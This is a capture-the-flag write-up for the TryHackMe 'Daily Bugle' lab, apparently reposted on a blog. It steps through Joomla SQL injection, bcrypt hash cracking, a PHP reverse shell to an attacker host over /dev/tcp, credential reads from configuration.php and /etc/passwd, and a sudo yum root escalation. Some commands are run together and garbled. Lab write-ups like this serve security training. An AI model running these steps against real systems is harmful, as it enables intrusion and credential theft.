Tryhackme:Daily bugle_CTF-泓源视野

Tryhackme:Daily bugle_CTF

[Enumeration]

  1. Port scan
nmap -Pn <ip>

There’re 3 ports: 22,80, and 3306.

Tryhackme:Daily bugle_CTF插图

Tryhackme:Daily bugle_CTF插图1

2. OS and service scan

nmap -A -p 22,80,3306 <ip>

This machine is CentOS.

Tryhackme:Daily bugle_CTF插图2

Tryhackme:Daily bugle_CTF插图3

3. Vuln scan

nmap --script vuln -p 22,80,3306 <ip>
Tryhackme:Daily bugle_CTF插图4

Tryhackme:Daily bugle_CTF插图5

This machine has Joomla 3.7.0 ,which has SQLi vulnerability.

Tryhackme:Daily bugle_CTF插图6

Tryhackme:Daily bugle_CTF插图7

4. Access HTTP site.

There’s news of Spiderman robbing the bank.

Tryhackme:Daily bugle_CTF插图8

Tryhackme:Daily bugle_CTF插图9

View page source, nothing.

Tryhackme:Daily bugle_CTF插图10

Tryhackme:Daily bugle_CTF插图11

From #3, let’s access /administrator

Tryhackme:Daily bugle_CTF插图12

Tryhackme:Daily bugle_CTF插图13

5. Search for default credential.

I only have “admin” without any password.

Tryhackme:Daily bugle_CTF插图14

Tryhackme:Daily bugle_CTF插图15

6. Search for exploits

searchsploit joomla 3.7.0

There’re SQLi and XSS.

Read XSS. It’s CVE-2017–8917 and sqlmap usage, but U will search for python script instead.

Tryhackme:Daily bugle_CTF插图18

Tryhackme:Daily bugle_CTF插图19


[Exploitation]

  1. After searching with google, I came across to this.

stefanlucas/Exploit-Joomla

CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0 - stefanlucas/Exploit-Joomla

github.com

python joomblah.py http://<ip>

Now I have a username, jonah, and password hash.

Tryhackme:Daily bugle_CTF插图20

Tryhackme:Daily bugle_CTF插图21

2. Cracking password

Using example hash guide

example_hashes [hashcat wiki]

If you get a "line length exception" error in hashcat, it is often because the hash mode that you have requested does…

hashcat.net

The hash may be bcrypt.

Tryhackme:Daily bugle_CTF插图22

Tryhackme:Daily bugle_CTF插图23

I will use hashcat on windows for better formance.

Save hash in text file as daily-bugle.txt.

Tryhackme:Daily bugle_CTF插图24

Tryhackme:Daily bugle_CTF插图25

Use hashcat

hashcat.exe -m 3200 daily-bugle.txt rockyou.txt

Now I have a password for joomla.

Tryhackme:Daily bugle_CTF插图26

Tryhackme:Daily bugle_CTF插图27

3. Login to Joomla

Tryhackme:Daily bugle_CTF插图28

Tryhackme:Daily bugle_CTF插图29

Now I have a dashboard.

Tryhackme:Daily bugle_CTF插图30

Tryhackme:Daily bugle_CTF插图31

4. Reverse shell

I will use this guide to get reverse shell.

Joomla: Reverse Shell

Joomla is one of the popular Content Management System (CMS) which helps you to build your website. Joomla has gained…

laptrinhx.com

Click “Templates”.

Tryhackme:Daily bugle_CTF插图32

Tryhackme:Daily bugle_CTF插图33

Select first template

Tryhackme:Daily bugle_CTF插图34

Tryhackme:Daily bugle_CTF插图35

Select index.php

Tryhackme:Daily bugle_CTF插图36

Tryhackme:Daily bugle_CTF插图37

Prepare listener on port 1234

nc -lvp 1234
Tryhackme:Daily bugle_CTF插图38

Tryhackme:Daily bugle_CTF插图39

Prepare reverse shell

exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'");

Inject with reverse shell

Tryhackme:Daily bugle_CTF插图40

Tryhackme:Daily bugle_CTF插图41

Click Template review

Tryhackme:Daily bugle_CTF插图42

Tryhackme:Daily bugle_CTF插图43

Now I have a shell.

Tryhackme:Daily bugle_CTF插图44

Tryhackme:Daily bugle_CTF插图45


[Privilege Escalation]

  1. Verify user
id

I’m apache.

Tryhackme:Daily bugle_CTF插图46

Tryhackme:Daily bugle_CTF插图47

2. Normally most CMS have credential in config file. Let’s get it in case I need somewhere else.

ls cat configuration.php

I have a new credential. I can use it somewhere.

Tryhackme:Daily bugle_CTF插图48

Tryhackme:Daily bugle_CTF插图49

3. Verify users

cat /etc/passwd

This machine has 2 users: root and jjameson.

Tryhackme:Daily bugle_CTF插图50

Tryhackme:Daily bugle_CTF插图51

4. Login as jjameson

Try to login with joomla credential

su jjameson

Failed!!!

Tryhackme:Daily bugle_CTF插图52

Tryhackme:Daily bugle_CTF插图53

Try to login with credential from config file

su jjamesonid

Success!!!

Tryhackme:Daily bugle_CTF插图54

Tryhackme:Daily bugle_CTF插图55

5. Verify sudo

There’s yum command.

Tryhackme:Daily bugle_CTF插图56

Tryhackme:Daily bugle_CTF插图57

Following GTFOBins. There’re 2 ways of exploiting

yum | GTFOBins

It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated…

gtfobins.github.io

Let’s try first set of commands

Tryhackme:Daily bugle_CTF插图58

Tryhackme:Daily bugle_CTF插图59

Failed!!!

Tryhackme:Daily bugle_CTF插图60

Tryhackme:Daily bugle_CTF插图61

Let’s try these instead

Tryhackme:Daily bugle_CTF插图62

Tryhackme:Daily bugle_CTF插图63

Tryhackme:Daily bugle_CTF插图64

Tryhackme:Daily bugle_CTF插图65

6. Read user.txt

Now I’m root. Let’s get the answer for this box

cd /home/jjamesonlscat user.txt
Tryhackme:Daily bugle_CTF插图66

Tryhackme:Daily bugle_CTF插图67

cd /rootlscat root.txt
Tryhackme:Daily bugle_CTF插图68

Tryhackme:Daily bugle_CTF插图69

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
9

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8233573 位访客, 您的IP是:[172.70.38.229]